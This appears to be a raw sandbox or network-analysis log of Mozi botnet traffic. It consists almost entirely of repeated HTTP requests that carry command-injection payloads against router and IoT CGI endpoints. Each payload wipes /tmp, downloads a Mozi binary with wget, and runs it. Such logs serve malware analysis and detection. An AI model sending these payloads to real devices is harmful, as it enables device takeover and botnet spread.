                            Source: unknownTCP traffic detected without corresponding DNS query: 134.224.138.24
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.23.54.208
                            Source: unknownTCP traffic detected without corresponding DNS query: 170.93.179.178
                            Source: unknownTCP traffic detected without corresponding DNS query: 196.155.214.59
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 122.248.149.165:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 192.97.26.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 107.227.55.144:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 179.251.32.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 158.166.4.165:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 161.154.233.90:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 118.79.188.67:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 129.46.212.84:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 157.96.102.17:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 50.196.185.72:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 177.200.207.58:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 122.187.139.190:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 177.120.79.8:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 117.244.40.134:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 97.137.41.211:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 55.164.19.178:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 76.160.156.242:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
